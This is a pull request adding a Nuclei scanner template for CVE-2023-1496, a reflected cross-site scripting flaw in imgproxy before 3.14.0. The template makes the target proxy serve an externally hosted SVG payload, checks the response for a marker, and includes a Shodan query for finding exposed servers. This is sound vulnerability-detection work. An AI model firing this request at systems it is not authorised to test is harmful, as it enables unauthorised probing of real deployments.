### PR TITLE
Added CVE-2023-1496

### DIFF
--- a/http/cves/2023/CVE-2023-1496.yaml
+++ b/http/cves/2023/CVE-2023-1496.yaml
@@ -24,7 +24,7 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/unsafe/plain/http://hackwithautomation.com/s/test.svg"
+      - "{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg"
 
     matchers:
       - type: dsl

--- a/http/cves/2023/CVE-2023-1496.yaml
+++ b/http/cves/2023/CVE-2023-1496.yaml
@@ -1,0 +1,39 @@
+id: CVE-2023-1496
+
+info:
+  name: Imgproxy < 3.14.0 - Cross-site Scripting (XSS)
+  author: pdteam
+  severity: medium
+  description: Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.
+  reference:
+    - https://github.com/imgproxy/imgproxy/commit/62f8d08a93d301285dcd1dabcc7ba10c6c65b689
+    - https://huntr.dev/bounties/de603972-935a-401a-96fb-17ddadd282b2
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2023-1496
+    cwe-id: CWE-79
+    epss-score: 0.00051
+    cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: "Server: imgproxy"
+  tags: cve,cve2023,imgproxy,xss,svg
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/unsafe/plain/http://hackwithautomation.com/s/test.svg"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body, 'PC9zdmc+#test')
+          - status_code == 200
+        condition: and
+
+    extractors:
+      - type: dsl
+        dsl:
+          - content_security_policy


### PR DESCRIPTION
### Template / PR Information

- Added Imgproxy < 3.14.0 - Cross-site Scripting (XSS) - CVE-2023-1496
- References: https://huntr.dev/bounties/de603972-935a-401a-96fb-17ddadd282b2

### TODO:

-  [x] `http://hackwithautomation.com` need to be replaced with a static host/bucket.

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)